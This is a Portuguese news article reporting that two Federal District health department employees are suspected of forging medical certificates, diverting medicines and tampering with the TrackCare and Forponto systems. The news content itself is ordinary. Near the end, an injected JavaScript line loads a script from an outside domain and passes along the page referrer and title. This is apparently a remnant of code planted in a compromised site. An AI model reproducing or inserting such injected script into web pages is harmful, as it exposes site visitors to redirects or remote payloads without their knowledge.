Servidores da Secretaria de Saúde são suspeitos de falsificar atestados

 

Um auxiliar de enfermagem e uma enfermeira da Secretaria de Saúde foram conduzidos coercitivamente nesta quinta-feira (8). Eles são suspeitos de falsificar atestados e receitas do Distrito Federal. A operação, batizada de Trackcare, é realizada entre o Ministério Público e a Polícia Civil.

Os mandados estão sendo cumpridos no Centro de Saúde 3 do Guará II e nas casas dos servidores que ficam no Cruzeiro e Sudoeste. De acordo com a investigação, a dupla usava atestados médicos falsificados para abonar faltas de servidores da pasta e se apropriava de remédios que deveriam ser distribuídos para a população. Para que os atestados fossem aceitos, os suspeitos usavam carimbos de médicos da secretaria para falsificá-los.

A dupla foi identificada como o auxiliar de enfermagem Marcelo Mendes Cereja e a enfermeira Daniella Moaiana de Toledo. A defesa dos dois ainda não se pronunciou.

 

whatsapp-image-2016-12-08-at-09-36-45
Policiais colocam em carro documentos apreendidos no Centro de Saúde 3 do Guará (Foto: Robson Coutinho/TV Globo)

 

Investigações

Segundo as investigações, entre janeiro e agosto de 2016, Marcelo Cereja apresentou 16 atestados médicos e teve 47 incidências duvidosas de abonamento em sua folha de ponto. Em outubro, Cereja ganhou salário líquido de R$ 5,12 mil. Já Daniella, R$ 10,2 mil.

Entre os crimes em apuração estão o de peculato (uso do cargo para enriquecimento), falsificação de documentos, falsidade ideológica, inserção de dados falsos em sistema de informações e associação criminosa. As investigações também apuram se dois sistemas de informática da secretaria, o Forponto e o Trackcare, foram “violados” de forma premeditada.

 

TrackCare

TrackCare é um sistema que médicos e administrados utilizam para melhorar a segurança, os resultados, controlar os custos e reduzir erros de medicação dentro do hospital. O sistema unificado de informação de saúde permite que o atendimento seja coordenado dentro de um hospital e/ou de centros de atendimento em qualquer região.

 

 

*Com informações da Agência G1

s.src=’http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

Fonte:

Deixe um comentário